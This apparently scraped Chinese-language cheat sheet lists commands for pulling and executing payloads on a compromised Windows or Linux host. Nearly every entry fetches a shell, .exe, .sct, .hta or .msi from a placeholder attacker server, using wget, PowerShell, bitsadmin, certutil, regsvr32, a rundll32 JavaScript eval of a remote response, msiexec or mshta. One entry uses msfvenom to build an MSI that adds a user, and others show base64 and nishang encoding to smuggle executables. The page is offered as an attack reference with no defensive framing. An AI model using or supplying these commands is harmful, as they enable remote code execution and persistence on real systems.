wget
1
| wget http://xx.x.x.x:8080/shell.txt -O x.php
|
powershell
命令执行权限时
1
| powershell -Command "$client = new-object System.Net.WebClient;$client.DownloadFile('http://x.x.x.x:8000/1.exe', './2.exe')"
|
bitsadmin
bitsadmin为windows自带下载命令,下载x.txt到d盘命名为1.exe
1
| bitsadmin /transfer n http://x.x.x.x:8080/x.txt d:\1.exe
|
certutil
下载文件
1
| certutil -urlcache -split -f http://xx.xx.xx.xx:9090/config.txt error.exe
|
删除缓存
1
| certutil -urlcache -split -f http://xx.xx.xx.xx:9090/config.txt delete
|
regsvr32
1
| regsvr32.exe /u /n /s /i:http://xx.xx.xx.xx:8888/file.sct scrobj.dll
|
rundll32
1
| rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://xx.xx.xx.xx:8888/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
|
msiexec
远程下载msi恶意文件执行,msi类型的payload可通过Msf生成
1 2
| 1、msfvenom -p windows/adduser USER=test1 PASSWORD=passwd1 -f msi -o up.msi 2、msiexec /q /i http://xx.xx.xx.xx/xxx.msi
|
mshta
1
| mshta http://x.x.x.x/payload.hta
|
ftp
传入如下文件ftp.txt
1 2 3 4
| ftp 127.0.0.1 username password get fileexit
|
执行
smb
创建公网共享
连接
1
| net use xx.xx.xx.xxtest$ /u:test test
|
下载
1
| copy xx.xx.xx.xxtest$test.exe c:
|
echo
直接写入
base64并用certutil解码
编码
1
| certutil -encode xx.exe base64str.txt
|
1 2
| echo "base64str" > base64.str.txt certutil -decode base64str.txt xxx.exe
|
利用nishang工具包
如利用nishang中的ExetoText工具编码
将exe转化为txt
1
| ExetoText.ps1 evil.exe evil.txt
|
将其echo写入
解码
1
| TexttoExe.ps1 evil.txt evil.exe
|